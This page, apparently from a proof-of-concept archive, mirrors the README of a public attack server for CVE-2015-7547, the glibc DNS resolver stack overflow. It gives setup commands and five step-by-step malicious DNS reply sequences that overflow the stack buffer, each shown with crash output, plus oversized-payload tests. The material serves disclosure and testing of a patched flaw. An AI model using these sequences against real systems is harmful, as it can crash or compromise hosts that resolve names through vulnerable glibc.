Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-7547 PoC — GNU C Library 缓冲区错误漏洞

Source
https://github.com/eSentire/cve-2015-7547-public
Associated Vulnerability
Title:GNU C Library 缓冲区错误漏洞 (CVE-2015-7547)
Description:Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing "dual A/AAAA DNS queries" and the libnss_dns.so.2 NSS module.
Description
PoC attack server for CVE-2015-7547 buffer overflow vulnerability in glibc DNS stub resolver (public version)
Readme
# PoC attack server for CVE-2015-7547 vulnerability in glibc DNS stub resolver

To test on local machine with a vulnerable glibc version:

```
user@localhost:/$ echo 'nameserver 127.0.0.127' | sudo tee /etc/resolv.conf
user@localhost:/$ echo 'nameserver 127.0.0.127' | sudo tee -a /etc/resolv.conf
user@localhost:/$ sudo python3 attack-server.py 127.0.0.127
Starting UDP server on 127.0.0.127:53...
Starting TCP server on 127.0.0.127:53...
```

Then, from another terminal session, execute the attacks as shown in the examples below.

## Attack 1 (UDP+TCP)

Needs ability to send replies > 2048 bytes over UDP and TCP.

Attack Sequence:

1. UDP reply, > 2048 bytes, valid header/question, TC flag set (triggers buffer mismanagement and TCP retry)

2. TCP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

3. TCP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack1
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 2 (UDP only)

Needs ability to send replies > 2048 bytes over UDP.

Attack Sequence:

1. UDP reply, > 2048 bytes, invalid header (triggers buffer mismanagement, not counted as a valid response)

2. Ignore next request (triggers UDP retry due to polling timeout)

3. UDP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. UDP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack2
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 3 (UDP+TCP)

Needs ability to send replies > 1024 bytes over UDP and > 2048 bytes over TCP.

Attack Sequence:

1. UDP reply, 1024 bytes, valid header/question (fills up half of the stack-allocated buffer)

2. UDP reply, > 1024 bytes, valid header/question, TC flag set (triggers buffer mismanagement and TCP retry)

3. TCP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. TCP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack3
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 4 (UDP only)

Needs ability to send replies > 2048 bytes over UDP.

Attack Sequence:

1. UDP reply, 2048 bytes, valid header/question (fills up the stack-allocated buffer)

2. UDP reply (triggers buffer mismanagement and UDP retry due to 0-byte socket receive)

3. UDP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. UDP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack4
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 5 (TCP only)

Needs ability to send replies > 2048 bytes over TCP and at least two nameserver entries in `/etc/resolv.conf`.

Attack Sequence:

0. UDP reply, valid header/question, TC flag set (optional, triggers TCP retry if initial query is over UDP)

1. TCP reply, > 2048 bytes (triggers buffer mismanagement)

2. TCP reply, empty (triggers TCP retry due to 0-byte socket receive)

3. TCP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. TCP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack5
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Payload Tests

To trigger a valid type A/AAAA reply of a certain size from the server, send a request for one of the following:

* payload1 (> 64 bytes)
* payload2 (> 128 bytes)
* payload3 (> 256 bytes)
* payload4 (> 512 bytes)
* payload5 (> 1024 bytes)
* payload6 (> 2048 bytes)
* payload7 (> 4096 bytes)
* payload8 (> 8192 bytes)

The requests can be issued over UDP or TCP, and the responses will contain the appropriate number of valid A or AAAA answers to pad the reply to the requested size.  When the PoC server is set up as the authoritative name server for a test domain, this allows for exploring the behaviour of DNS cache hierarchies when faced with oversized replies.

Example:

```
user@localhost:/$ curl http://payload1.somedomain.com
```
File Snapshot

 [4.0K]  /data/pocs/80ea11b531708265db147f2ef22d4e39367c0e2c
├── [ 14K]  attack-server.py
├── [ 14K]  dnsutil.py
└── [4.2K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →